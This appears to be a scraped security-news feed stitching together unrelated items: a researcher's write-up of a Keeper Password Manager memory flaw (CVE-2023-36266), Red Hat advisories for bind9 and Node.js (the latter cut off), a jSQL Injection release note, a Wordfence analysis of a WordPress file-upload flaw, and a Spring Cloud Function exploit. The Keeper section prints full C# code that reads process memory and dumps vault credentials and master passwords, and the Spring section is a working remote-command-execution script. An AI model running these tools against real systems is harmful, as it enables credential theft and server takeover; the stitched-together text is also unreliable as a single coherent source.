An issue was discovered in Keeper Password Manager for Desktop version 16.10.2, and the KeeperFill Browser Extensions version 16.5.4, allows local attackers to gain sensitive information via plaintext password storage in memory after the user is already logged in, and may persist after logout.

**It's Not What You Think - It's Worse**

There are a number of password management solutions available to the public. While some have naturally been deprecated due to security concerns or improvements in cryptographic handling. The noteworthy part is that they usually don’t just hand over plain text passwords when asked.

With that piece of foreshadowing, the target for today’s post is a solution quickly growing in popularity even amongst enterprise users: **Keeper Password Manager**

**To Keep or Not To Keep**

To begin I start by installing Keeper Password Manager, creating an account, and creating some fake credential entries. By now I of course notice that the Desktop App was effectively Electron, or a Chromium Embedded Framework (CEF) application.

Now, the lowest hanging fruit thing I can think to attempt. Attach WinDebug to Keeper and use it to search memory for password strings or structures that could map where they are stored. Attempting to search for the credentials in memory very graciously gives them to us in plain text - oh joy.

Now I have an idea of how they are being stored in memory though and the JSON layout. This will prove useful in searching for others, so I used the start of the JSON to search for other entries. There were many - with each having two memory locations.

Now I begin looking for patterns that could help me figure out the mapping or locations these are written to, anything that could act as the equivalent to a V8 string mapping table.

After some searching and comparing a pattern begins to emerge. All the addresses have pointers for them stored at: 0x??fff0020 -> 0x??fff0030

Through further searching I did find that this could vary with the most reliable range being 0x??fff0010 -> 0x??fff1ff0 as the increments of 0x10 each appeared to store a pointer to a different string or value - including the JSON password strings.

**What A Dump ...**

There is a fundamental issue with our the above means of attempting to parse and extract passwords, and that is the JavaScript engine V8. The way in which this engine allocates memory and how it can vary kills any chances we have of relying on this for credential dumping. So upon restarting the target Keeper password manager vault, the pointer locations can vary wildly.

Fortunately, Enoch Wang, Samuel Zurowski, and Tyler Thomas published some research into V8 Memory mapping called Juicing V8 . So thanks to the University of New Haven for the helpful work and resources. Unfortunately, it didn’t help in this case - wether this is the result of Electron or V8 versioning or error on my part I am not sure.

According, to their work and corresponding Volatility Plugin: V8 operates by crating a MetaMap which stores a pointer reference to itself +0x1, this pointer is also present in the Object maps and the pointers for these Object maps are then once again stored in the Object Structures where strings and other data can be found and extracted.

So in theory, one could iterate over memory to find a specific byte pattern, always present at +0x10 bytes after the start of the MetaMap: ff 03 (40 | 20) 00 - at least according to the volatility plugin and the Juicing V8 research work. Sadly this byte pattern is seemingly unreliable and produces inaccurate results in the case of Keeper but it is something that could be built upon in future.

So, with no ‘refined’ means of mapping and parsing the target application’s memory I turned to the biggest hammer I could find for this metaphorical nail: **_RegEx_**

**Witty Expression Cirqa 1951**

To begin I started by constructing the necessary CSharp code.

        public static List<string> stringsList = new List<string>();
        static void Main(string[] args)
        {
            // Iterate over each process id
            foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
            {
                // Get process command line string
                string commandline = GetCommandLine(process);
                // Check if it matches known child process client id that stores credentials
                if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
                {
                    Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
                    Console.WriteLine("->Searching...\n");
                    // Get process handle, VM READ and QUERY
                    IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
                    // Start address
                    IntPtr address = new IntPtr(0x10000000000);
                    MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
                    // Iterate over memory regions
                    while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
                    {
                        // Check if memory committed & Type is private
                        if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
                        {
                            byte[] buffer = new byte[(int)memInfo.RegionSize];
                            // Read region into buffer the size of memory region.
                            if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
                            {
                                string text = Encoding.ASCII.GetString(buffer);
                                extract_credentials(text);
                                extract_master(text);
                                extract_account(text);
                            }
                        }
                        // Increment to next region
                        address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
                    }
                    // Close process handle when finished
                    CloseHandle(processHandle);
                }
            }
        }
    

I did spot that **Keeper** almost always starts the password containing child process with --renderer-client-id=5.

This can alter if the target child process crashes and the parent does not terminate, so felt it best to include a check for 7 as well:

        public static string GetCommandLine(this Process process)
        {
            if (process is null || process.Id < 1)
            {
                return "";
            }
            // Construct LINQ query to get process command line
            string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
    
            // Create Object Searcher and get then return command line
            using (var searcher = new ManagementObjectSearcher(query))
            using (var collection = searcher.Get())
            {
                var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
                return managementObject != null ? (string)managementObject["CommandLine"] : "";
            }
        }
    

Moving onto the next step, we need to be able to make all our needed Win32 API calls. To accomodate this I created the necessary DLL Imports.

Also, no I did not go the extra mile and make use of D/Invoke or Syscalls, I have some love for my free time.

We can now make a call to get a handle to the target process with both virtual Memory read and query information permissions. Using this handle we can perform the needed operations to extract potential credential data.

        [DllImport("kernel32.dll")]
        public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);
    
        [DllImport("kernel32.dll")]
        public static extern bool CloseHandle(IntPtr hObject);
    
        [DllImport("ntdll.dll")]
        public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);
    
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);
    
        [StructLayout(LayoutKind.Sequential)]
        public struct MEMORY_BASIC_INFORMATION
        {
            public IntPtr BaseAddress;
            public IntPtr AllocationBase;
            public uint AllocationProtect;
            public IntPtr RegionSize;
            public uint State;
            public uint Protect;
            public uint Type;
        }
    

Now finally to incorporate the code to handle extracting the records. Under more surgical conditions we could attempt to precisely determine the length. If we look around near the stored password JSON string we can quickly identify a useful set of bytes. Exactly 8 bytes prior to the password JSON is four bytes that are almost always seemingly 0x00000180 | 384.

If we however create an entry in Keeper that exceeds this length we see it changes to 0x00000400 | 1024

If we compare the base address with this length - 0x1 we can see we perfectly match the padding that surrounds the end of the JSON string object which is always padded with 0x20’s.

However, as discussed before, surgical precision and the V8 MetaMap structures were not reliable during my analysis. So with this in mind we can simply rely on RegEx to grab the appropriate JSON structure. I would like to apologise in advance for the messiest set of Regular Expressions to grace the internet.

        public static void extract_credentials(string text)
        {
            // Index for start of target JSON string
            int index = text.IndexOf("{\"title\":\"");
            // Index for end of JSON string
            int eindex = text.IndexOf("}");
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    // Create regex statement to match JSON structure
                    Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
                    // Use regex to match and convert the match to a string
                    string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
    
                    // Get index of end of the regex match (for cleaning)
                    int match_cut = match.IndexOf("}  ");
                    // if matched
                    if (match_cut != -1 )
                    {
                        // Cut and trim the match to remove duplicates and empty spaces
                        match = match.Substring(0, match_cut + "}  ".Length).TrimEnd();
                        // Compare to string list to check if already extracted
                        if (!stringsList.Contains(match) && match.Length > 20)
                        {
                            Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "}  ".Length) + "\n");
                            stringsList.Add(match);
                        }
    
                    } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
                    {
                        Console.WriteLine("->Credential Record Found : " + match + "\n");
                        stringsList.Add(match.TrimEnd());
                    }
                    index = text.IndexOf("{\"title\":\"", index + 1);
                    eindex = text.IndexOf("}", eindex + 1);
                }
                catch
                {
                    return;
                }
    
            }
        }
    

However, there are crucial bits of data missing here. Keeper stores far more of value in memory than just the vault records. One can find the user account email address in memory using the below.

        public static void extract_account(string text)
        {
            int index = text.IndexOf("{\"expiry\"");
            int eindex = text.IndexOf("}");
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
                    string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    if ((match.Length > 2))
                    {
                        Console.WriteLine("->Account Record Found : " + match + "\n");
                        return;
                    }
                    index = text.IndexOf("{\"expiry\"", index + 1);
                    eindex = text.IndexOf("}", eindex + 1);
                }
                catch
                {
                    return;
                }
            }
    
        }
    

Also, while the idea of a master password is great - it is conveniently stored in memory in plain text right next to a recognizable data_key identifier for easy retrieval.

 

An exception to this is SSO logins which instead appear to store a JSON Web Token, in a separate JSON object. Not that anyone has an interest in that, **_wink wink_**.

So I shall apply checks for the master password too, by looking for the data\_key key word and filtering out known useless result patterns.

        public static void extract_master(string text)
        {
            int index = text.IndexOf("data_key");
            int eindex = index + 64;
            while (index >= 0)
            {
                try
                {
                    int endIndex = Math.Min(index + eindex, text.Length);
                    Regex reg = new Regex("(data_key[ -~]+)");
                    var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                    Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
                    if (match_one.Replace("data_key", "").Length > 5)
                    {
                        if (!clean.IsMatch(match_one.Replace("data_key", "")))
                        {
                            Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
                        }
    
                    }
                    index = text.IndexOf("data_key", index + 1);
                    eindex = index + 64;
                }
                catch
                {
                    return;
                }
    
            }
        }
    

**Burn The Dump**

After debugging and testing my code I have now reached a stable point where it consistently dumps all stored credentials across hosts and installs.

From here it is worth asking, what happens when it signs the user out or if a user deletes a record? Well fear not, it does nothing. Unless you are using an enterprise or SSO sign-in, memory clearing will not be configured by default.

So long as the application and its child processes haven’t been entirely restarted then they are kept nicely in memory. This even applies to if your session ‘times out’, so long as the memory clearing setting hasn’t been manually enabled by the user.

Well surely the browser extension doesn’t suffer from this issue and manages the storage of clear text credentials carefully with clearing of memory and on-demand credential retrieval? No, it really doesn’t. The below is a live MSEDGE browser child process memory which has all the credentials stored in plain text.

For any of those wondering if this is of concern to Keeper please see the attached out-of-scope vulnerability disclosure bullet point.

*   **Bugs that rely on keylogging, compromise of the operating system or privileged access**

Never the less, MITRE has reserved the above issues under **CVE-2023-36266**.

So, in conclusion I can highly recommend Keeper Security and their secure password storage solutions. If you would like to make full use of Keeper’s broad feature set feel free to download my tool from here: **Peeper Password Dumper**

While my tool doesn’t parse and retrieve credentials from browsers, I am sure some smart people out there will have that working soon. Thanks for reading.

CVE-2023-36266: Keeper Security - Dumping Cleartext Passwords

Red Hat Security Advisory 2023-4037-01 - An update for bind9.16 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: bind9.16 security update  
Advisory ID:       RHSA-2023:4037-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4037  
Issue date:        2023-07-12  
CVE Names:         CVE-2023-2828   
=====================================================================

1. Summary:

An update for bind9.16 is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain  
Name System (DNS) protocols. BIND includes a DNS server (named); a resolver  
library (routines for applications to use when interfacing with DNS); and  
tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind: named's configured cache size limit can be significantly exceeded  
(CVE-2023-2828)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2216227 - CVE-2023-2828 bind: named's configured cache size limit can be significantly exceeded

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
bind9.16-9.16.23-0.7.el8_6.2.src.rpm

aarch64:  
bind9.16-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-chroot-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-libs-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-utils-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.aarch64.rpm

noarch:  
bind9.16-license-9.16.23-0.7.el8_6.2.noarch.rpm

ppc64le:  
bind9.16-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-chroot-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-libs-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-utils-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.ppc64le.rpm

s390x:  
bind9.16-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-chroot-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-libs-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-utils-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.s390x.rpm

x86_64:  
bind9.16-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-chroot-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-libs-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-utils-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-devel-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-dnssec-utils-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.aarch64.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.aarch64.rpm

noarch:  
bind9.16-doc-9.16.23-0.7.el8_6.2.noarch.rpm  
python3-bind9.16-9.16.23-0.7.el8_6.2.noarch.rpm

ppc64le:  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-devel-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-dnssec-utils-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.ppc64le.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.ppc64le.rpm

s390x:  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-devel-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-dnssec-utils-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.s390x.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.s390x.rpm

x86_64:  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.i686.rpm  
bind9.16-debuginfo-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.i686.rpm  
bind9.16-debugsource-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-devel-9.16.23-0.7.el8_6.2.i686.rpm  
bind9.16-devel-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-dnssec-utils-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.i686.rpm  
bind9.16-dnssec-utils-debuginfo-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-libs-9.16.23-0.7.el8_6.2.i686.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.i686.rpm  
bind9.16-libs-debuginfo-9.16.23-0.7.el8_6.2.x86_64.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.i686.rpm  
bind9.16-utils-debuginfo-9.16.23-0.7.el8_6.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2828  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrqznAAoJENzjgjWX9erEw/8P/0zS6p5Tgv+K8x/IVas9/mL6  
uYxNhhA1Orqih9soIlRA9pbmt5CDR7bx/7P2HmiVabxkU9C6gYt1ThnrYapyK4je  
3YitOGzydReDKxycxBWOhMSVRmNgJRiSNpr+NF6jQgmQA12D5m4iKWKEz9tTtxup  
VcZ7DfviU8i7r84oHZstXa/W1t3hzDleT+JbSG5ca8aKNMaEPi0BPlEdpD2zSXi1  
U5685W2LifcU/zEogOi1/rRXvT9BBXW9w3XpL2WmRcmPbxkXhoY417e1z4qflEzf  
Hv+7aYu9r8c+G2Cd4P3RH7Ll+WtqQnmB+dAzYMrXQMUCKBG2kIs08ZLBvnWDs8g9  
SQ5+f+bg1GmwPqKNlR6mn5aSILohYBZj9qDNfJ6TKtEJ7hTnJdNXcKyOz8UyEfI2  
J5m2I8jqZ3sMvqTePb5GtD+Uy2/mQdqhFbdjp0t5K7hs/Zod4ns0LKKu0mV5zy5q  
GUt3h1njSQGiUpINPSIn8X0lOXN+fVRMP3YtACDZh3MIsBN9fdKjNH2QWuUeur3K  
6a4C4P4PPSNqAwdtdrgRl0KUcjUPoPZuvcB4eVxk8fr4iikLoQXSg/V/uymSbj8p  
0pgB3NrrNac8OxaqzlGzOquqpZa6tF3iFMmqpOBb9fD5AIyYSroLc0qS6znOwhux  
mduxW862FXmrmApN7Tn1  
=7UCA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4037-01

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.87

The User Registration plugin for WordPress is vulnerable to arbitrary file uploads due to a hard-coded encryption key and missing file type validation on the ur_upload_profile_pic function in versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with subscriber-level capabilities or above to upload arbitrary files on the affected site's server which may make remote code execution possible. This was partially patched in version 3.0.2 and fully patched in version 3.0.2.1.

Description: User Registration <= 3.0.2 – Authenticated (Subscriber+) Arbitrary File Upload 

Affected Plugin: User Registration – Custom Registration Form, Login Form And User Profile For WordPress

Plugin Slug: user-registration

Affected Versions: <= 3.0.2

CVE ID: CVE-2023-3342

CVSS Score: 9.9 (Critical)

CVSS Vector:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Researcher/s: Lana Codes 

Fully Patched Version: 3.0.2.1

The User Registration plugin for WordPress is vulnerable to arbitrary file uploads due to a hardcoded encryption key and missing file type validation on the ‘ur_upload_profile_pic’ function in versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with subscriber-level capabilities or above to upload arbitrary files on the affected site’s server which may make remote code execution possible. This was partially patched in version 3.0.2 and fully patched in version 3.0.2.1.

Technical Analysis

The User Registration plugin provides a versatile drag and drop registration form builder, with custom fields and unlimited customization options. It also provides a login form. After logging in, it provides users with a profile that allows various types of customization, including uploading a profile picture.

Examining the code reveals that the plugin uses two separate functions to set the profile picture. The first AJAX function uploads the profile picture to a temp folder, and the second request moves the file and sets the profile picture to the user.

The profile_pic_upload() function uses a generic image upload solution, which checks the file extension and then uploads the image to the temp folder. The interesting part is that the data from the uploaded file is encrypted within the AJAX response:

[VIEW THIS CODE SNIPPET ON THE BLOG] 

JSON response after the file upload in the profile_pic_upload() function

The encrypted upload_files data in the response is something like this:

upload_files-response 

Encryption is used due to the way the plugin handles uploads because the encrypted data is decrypted and used to determine the filename and filepath where the file is saved for the user. However, for data to be encrypted and decrypted, an encryption key is required. As a general rule, encryption keys should be confidential and unique to each website.

[VIEW THIS CODE SNIPPET ON THE BLOG] 

We unfortunately found that the encryption key is hardcoded in vulnerable versions of the plugin in the crypt_the_string() function, which means that threat actors also had access to the key which was not unique per WordPress installation. This makes it possible for attackers to craft an uploaded files data array payload that can be used to modify the filename, path, and extension when saving the profile picture.

The plugin calls the function ur_upload_profile_pic() when saving the profile, which contains the following code:

[VIEW THIS CODE SNIPPET ON THE BLOG] 

Rename and move the file in ur_upload_profile_pic() function

The function decrypts the encrypted file data, which is specified in the save request. Based on this data, the file in the temp folder is moved and renamed using the rename() php function. Unfortunately, however, there is no file type check before it, which means that the image file can be renamed to a file with any type of extension, such as .php, .phtml, .html, and more.

Exploit Possibilities

Exploiting the vulnerability requires multiple complex steps, as two separate functions and requests must be used to upload and move the file:

- Register a user  
- Log in as the user (since it is only possible to upload a profile picture for the user)  
- Upload the malicious exploit.png image file  
- Retrieve the encrypted file data from the response  
- Decrypt the file data  
- Modify the file extension to php in the file name  
- Encrypt the file data  
- Save the profile with the encrypted and modified file data

Since it is only possible to upload an image file during the upload process, because its extension is checked, the initial step involves uploading a file named, for example, exploit.png as a profile picture with the following request:

user_registration_profile_pic_upload-http-request 

In this scenario, the attacker uploads an exploit.png file, which is actually a PHP script, but with a .png extension:

[VIEW THIS CODE SNIPPET ON THE BLOG] 

The response will be a json payload containing the encrypted result returned from the profile_pic_upload() function. The ‘upload_files’ parameter needs to be decrypted using the hardcoded key, which will return a serialized array, similar to this:

upload_files-array 

The attacker would then change the file name from exploit.png to exploit.php and re-encrypt the array. The newly encrypted result can then be used when saving the profile in the next request:

save_profile_details-http-request 

The exploit renames the image file to php and moves it to the profile pictures folder.

The complete exploit process looks like this:

user-registration-howto-wordfence 

Wordfence Firewall

The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.

user-registration-howto-wordfence-firewall 

Disclosure Timeline

June 19, 2023 – Discovery of the Arbitrary File Upload vulnerability in User Registration.

June 19, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.

June 19, 2023 – The vendor confirms the inbox for handling the discussion.

June 19, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.

June 20, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.

June 29, 2023 – A partial patch is released in version 3.0.2.

July 4, 2023 – A fully patched version of the plugin, 3.0.2.1, is released.

July 20, 2023 – Wordfence Free users receive the same protection.

Conclusion

In this blog post, we detailed an Arbitrary File Upload vulnerability within the User Registration plugin affecting versions 3.0.2 and earlier. This vulnerability allows authenticated threat actors with subscriber-level permissions or higher to upload arbitrary files, including PHP backdoors, and execute those files on the server. The vulnerability has been fully addressed in version 3.0.2.1 of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of User Registration.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 20, 2023. Sites still using the free version of Wordfence will receive the same protection on July 20, 2023.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress User Registration 3.0.2 Arbitrary File Upload

Spring Cloud version 3.2.2 suffers from a remote command execution vulnerability.

    # Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)# Date: 07/07/2023# Exploit Author: GatoGamer1155, 0bfxgh0st# Vendor Homepage: https://spring.io/projects/spring-cloud-function/# Description: Exploit to execute commands exploiting CVE-2022-22963# Software Link: https://spring.io/projects/spring-cloud-function# CVE: CVE-2022-22963import requests, argparse, jsonparser = argparse.ArgumentParser()parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True)parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True)args = parser.parse_args()print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n")headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command }data = {"data": ""}request = requests.post(args.url, data=data, headers=headers)response = json.dumps(json.loads(request.text), indent=2)print(response)

Spring Cloud 3.2.2 Remote Command Execution

Red Hat Security Advisory 2023-4039-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: rh-nodejs14-nodejs security update  
Advisory ID:       RHSA-2023:4039-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4039  
Issue date:        2023-07-12  
CVE Names:         CVE-2023-31124 CVE-2023-31130 CVE-2023-31147   
                   CVE-2023-32067   
=====================================================================

1. Summary:

An update for rh-nodejs14-nodejs is now available for Red Hat Software  
Collections.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for RHEL Workstation(v. 7) - noarch, ppc64le, s390x, x86_64  
Red Hat Software Collections for RHEL(v. 7) - noarch, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

* c-ares: Buffer Underwrite in ares_inet_net_pton() (CVE-2023-31130)

* c-ares: Insufficient randomness in generation of DNS query IDs  
(CVE-2023-31147)

* c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
(CVE-2023-31124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209494 - CVE-2023-31124 c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
2209497 - CVE-2023-31130 c-ares: Buffer Underwrite in ares_inet_net_pton()  
2209501 - CVE-2023-31147 c-ares: Insufficient randomness in generation of DNS query IDs  
2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Software Collections for RHEL Workstation(v. 7):

Source:  
rh-nodejs14-nodejs-14.21.3-4.el7.src.rpm

noarch:  
rh-nodejs14-nodejs-docs-14.21.3-4.el7.noarch.rpm

ppc64le:  
rh-nodejs14-nodejs-14.21.3-4.el7.ppc64le.rpm  
rh-nodejs14-nodejs-debuginfo-14.21.3-4.el7.ppc64le.rpm  
rh-nodejs14-nodejs-devel-14.21.3-4.el7.ppc64le.rpm  
rh-nodejs14-nodejs-full-i18n-14.21.3-4.el7.ppc64le.rpm  
rh-nodejs14-npm-6.14.18-14.21.3.4.el7.ppc64le.rpm

s390x:  
rh-nodejs14-nodejs-14.21.3-4.el7.s390x.rpm  
